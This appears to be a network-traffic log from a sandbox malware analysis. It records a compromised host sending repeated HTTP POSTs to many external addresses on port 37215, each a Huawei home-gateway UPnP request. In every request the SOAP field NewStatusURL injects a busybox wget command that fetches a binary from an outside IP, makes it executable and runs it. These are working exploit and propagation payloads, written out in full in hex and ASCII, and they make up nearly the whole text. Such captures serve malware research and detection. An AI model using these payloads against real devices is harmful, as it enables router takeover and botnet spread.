                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1615192.168.2.1558060222.230.14.22937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645742893 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1616192.168.2.1553782138.23.254.2137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645759106 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1617192.168.2.154523494.36.190.22437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645766973 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1618192.168.2.1558724102.245.145.24237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645767927 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1619192.168.2.153293637.189.113.21937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645795107 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1620192.168.2.153912894.9.175.7237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645824909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1621192.168.2.1545620156.19.236.10137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645828009 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1622192.168.2.1537806121.165.120.8937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645837069 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1623192.168.2.1534108122.247.12.10437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645859003 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1624192.168.2.153585031.61.44.16137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645881891 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1625192.168.2.1554512121.35.211.5537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645915031 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
